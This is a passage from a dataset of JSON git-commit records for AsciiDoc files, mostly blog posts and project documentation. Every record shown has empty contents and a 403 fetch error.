2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf311d9b5419790843202e65b9f3f4958e444edd","subject":"Update 2012-08-12-Ben-Howard-Everything-Cover.adoc","message":"Update 2012-08-12-Ben-Howard-Everything-Cover.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2012-08-12-Ben-Howard-Everything-Cover.adoc","new_file":"_posts\/2012-08-12-Ben-Howard-Everything-Cover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3f61cc88e274289e4c1b34f6eb65d9c3e7ac3d1","subject":"Update 2017-03-01-repost-DW-Cn-and-innovation.adoc","message":"Update 2017-03-01-repost-DW-Cn-and-innovation.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-01-repost-DW-Cn-and-innovation.adoc","new_file":"_posts\/2017-03-01-repost-DW-Cn-and-innovation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"97efac356b2c6616d0d1a3c841229fe7631f4c9d","subject":"Update 2015-09-21-Aceess-Control.adoc","message":"Update 2015-09-21-Aceess-Control.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16c7d15db593caae491375046b21d99ab34c89d1","subject":"Update 2015-09-22-Een-nieuw-blog.adoc","message":"Update 2015-09-22-Een-nieuw-blog.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd9eca603af9f011455051d5af0980470a627c4b","subject":"Update 2016-03-11-Gorista-Design.adoc","message":"Update 2016-03-11-Gorista-Design.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-03-11-Gorista-Design.adoc","new_file":"_posts\/2016-03-11-Gorista-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1085292a8247ccacd372295af38df6a6d28699","subject":"Renamed '_posts\/2019-01-31-Test-Blog-Post.adoc' to '_posts\/2017-01-31-Test-Blog-Post.adoc'","message":"Renamed '_posts\/2019-01-31-Test-Blog-Post.adoc' to '_posts\/2017-01-31-Test-Blog-Post.adoc'","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-01-31-Test-Blog-Post.adoc","new_file":"_posts\/2017-01-31-Test-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66c06b386f189decc2570867ac1785c9aac29929","subject":"Add Changelog for 2.x","message":"Add Changelog for 2.x\n","repos":"codecentric\/spring-boot-admin,joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin,joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin","old_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/changes-2.x.adoc","new_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/changes-2.x.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshiste\/spring-boot-admin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de5c1adccf633d62dd48e6621a71767ca310c4b9","subject":"Update 2017-02-28-Hello-blog-World.adoc","message":"Update 
2017-02-28-Hello-blog-World.adoc","repos":"OdieD8\/hubpress.io,OdieD8\/hubpress.io,OdieD8\/hubpress.io,OdieD8\/hubpress.io","old_file":"_posts\/2017-02-28-Hello-blog-World.adoc","new_file":"_posts\/2017-02-28-Hello-blog-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OdieD8\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0741687baa683a2b6fe827d40466e61c8c86005","subject":"Update 2017-06-08-My-English-Title.adoc","message":"Update 2017-06-08-My-English-Title.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-08-My-English-Title.adoc","new_file":"_posts\/2017-06-08-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e18380a5266670456f19c5e798ea6edf8602308e","subject":"Update 2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","message":"Update 2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","new_file":"_posts\/2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df407728f9edaf01dcce3703de03422267ab14b4","subject":"Create do-codebase-improvements-es.adoc","message":"Create do-codebase-improvements-es.adoc\n\nSpanish translation for do-codebase-improvements.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-codebase-improvements-es.adoc","new_file":"src\/do\/do-codebase-improvements-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6209c4abf97da8904ed5de4aeea6534f20183090","subject":"Add README","message":"Add README\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"scratch\/csv2f64\/README.adoc","new_file":"scratch\/csv2f64\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb41bf91a31c4df08451afc6e38d27fd049b17db","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccfd7fc8be94b9f64a11f7ef5267928a36197340","subject":"Update 
2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a43926b48869eb6b1e3c566930ae532a874f87a","subject":"Update 2018-05-26-Sobre-este-blog.adoc","message":"Update 2018-05-26-Sobre-este-blog.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2018-05-26-Sobre-este-blog.adoc","new_file":"_posts\/2018-05-26-Sobre-este-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77b73a915fddc1c382e095f4852e352cba1e7d31","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9cb440d45ced12196f94ff6de4a6a42562c9d48","subject":"A guide about how to install the wal2json logical decoding plugin at Postgresql","message":"A guide about how to install the wal2json logical decoding plugin at Postgresql\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/install\/postgres-plugins.asciidoc","new_file":"docs\/install\/postgres-plugins.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"056b2347ab49d96df34135121ffa9d434e7517b0","subject":"Update 2015-04-08-Zweites-Posting.adoc","message":"Update 2015-04-08-Zweites-Posting.adoc","repos":"abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io","old_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abien\/abien.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcd240ac8cb5d2dcbe69704dc8037d382e657588","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 
2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66a7cd94732fbb3c95afe1bf1ab79d18eb529154","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db8ea396f2f6df0e0a6f168d5e8b2066f9931cad","subject":"Added IoCs for Ousaban","message":"Added IoCs for Ousaban\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"ousaban\/README.adoc","new_file":"ousaban\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6a6358eef470da7e4d43a667e429c470106888e6","subject":"Update 2016-12-08-November-Update.adoc","message":"Update 2016-12-08-November-Update.adoc","repos":"endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog","old_file":"_posts\/2016-12-08-November-Update.adoc","new_file":"_posts\/2016-12-08-November-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5543a5266dcd04a5876830aac8da9b0c1be40b4d","subject":"Update 2018-03-13-P-H-Per-Golang2.adoc","message":"Update 2018-03-13-P-H-Per-Golang2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-13-P-H-Per-Golang2.adoc","new_file":"_posts\/2018-03-13-P-H-Per-Golang2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79b0413a62b3b0605c3d2f5a811cc5019c92f77c","subject":"Update 2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","message":"Update 
2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","new_file":"_posts\/2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4a9c3d630433b2baf904b5e2ef0f16e46cfdfe6","subject":"added usage content to readme","message":"added usage content to readme\n","repos":"soosc\/metalsmith-publishon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soosc\/metalsmith-publishon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"539e953e4fbcbb0529175183d60c57dfbd12d617","subject":"Fixed project requirements","message":"Fixed project requirements\n\nLinks were updated and version information was dropped in order to\nspecify the bare minimum requirements and reduce situations where the\ndocumentation might not always be up-to-date with the *exact* version\nbeing used.\n","repos":"bkuhlmann\/ruby_setup,bkuhlmann\/ruby_setup","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/ruby_setup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c5ff881647c30496549336a1b8232db5ad72907","subject":"Renamed '_posts\/2018-01-01-Math-Jax-Test.adoc' to '_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc'","message":"Renamed '_posts\/2018-01-01-Math-Jax-Test.adoc' to '_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc'","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc","new_file":"_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7275eff0773af5462a469f2718e7e9c3bb794991","subject":"added zagg client check SOP","message":"added zagg client check 
SOP\n","repos":"joelddiaz\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,joelsmith\/openshift-tools,twiest\/openshift-tools,andrewklau\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,rhdedgar\/openshift-tools,ivanhorvath\/openshift-tools,blrm\/openshift-tools,rhdedgar\/openshift-tools,joelsmith\/openshift-tools,themurph\/openshift-tools,themurph\/openshift-tools,themurph\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,rhdedgar\/openshift-tools,tiwillia\/openshift-tools,andrewklau\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,openshift\/openshift-tools,openshift\/openshift-tools,andrewklau\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,ivanhorvath\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,tiwillia\/openshift-tools,openshift\/openshift-tools,joelddiaz\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,joelddiaz\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,joelsmith\/openshift-tools,themurph\/openshift-tools,jupierce\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,andrewklau\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,blrm\/openshift-tools,twiest\/openshift-tools,blrm\/openshift-tools,drewandersonnz\/openshift-tools,drewandersonnz\/openshift-tools,jupierce\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,blrm\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,drewandersonnz\/openshift-tools,tiwillia\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools","old_file":"docs\/zagg_client_checks.asciidoc","new_file":"docs\/zagg_client_checks.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b13ad8e632263ba1f572d75801525f43025c7e2d","subject":"Update 2017-06-21-I-Heart-Hugs-Wood.adoc","message":"Update 2017-06-21-I-Heart-Hugs-Wood.adoc","repos":"polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io","old_file":"_posts\/2017-06-21-I-Heart-Hugs-Wood.adoc","new_file":"_posts\/2017-06-21-I-Heart-Hugs-Wood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polarbill\/polarbill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dedc3c07741ec3f025590049ca4e46e7519d3340","subject":"Update 2017-09-02-Java-File-vs-Path.adoc","message":"Update 2017-09-02-Java-File-vs-Path.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-09-02-Java-File-vs-Path.adoc","new_file":"_posts\/2017-09-02-Java-File-vs-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"696cd9852b34b1778ece22cd7ea458e593dc632c","subject":"add event","message":"add 
event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojurebridge.adoc","new_file":"content\/events\/2022\/clojurebridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8e506a100b8a115b7fd1238ad8eb8a239035ffff","subject":"Add readme","message":"Add readme\n","repos":"ivargrimstad\/security-samples,ivargrimstad\/security-samples","old_file":"simple-embedded\/README.adoc","new_file":"simple-embedded\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/security-samples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f83d629d316e81b5eb44272d58b23af3227cc3fe","subject":"[DOC] Fix incorrect download versions","message":"[DOC] Fix incorrect download versions\n","repos":"girirajsharma\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df1c7a5a4335421d749506be7b9fe3e1cfa5f829","subject":"KUDU-1487 Add instructions for cutting a release","message":"KUDU-1487 Add instructions for cutting a release\n\nChange-Id: I5b52edb68d35d07ee50bb3c373bf866560f5bc93\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3614\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bca420349d14e18619e87db5528a1374929ce0d","subject":"Update 2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","message":"Update 2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","new_file":"_posts\/2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8100537e901bfa66629da6fc4d85074886e896a4","subject":"Update 2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","message":"Update 2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","new_file":"_posts\/2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a500ac2ca1c5ee51cea26fe033cea35f39c24e5","subject":"Deleted _posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Deleted _posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36cc26c8bd4084d3b8b05b646afba5f43089193a","subject":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9165ce0e113871b9c3b8512d8b4b1a1db208371d","subject":"Update 2015-06-06-Lorem-ipsum-3.adoc","message":"Update 2015-06-06-Lorem-ipsum-3.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a030fb535919ead941a2ea91ab95dcce409d1b11","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32eb5d728fceb3ed3b268db39f7e1e861fc961b3","subject":"Update 2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","message":"Update 
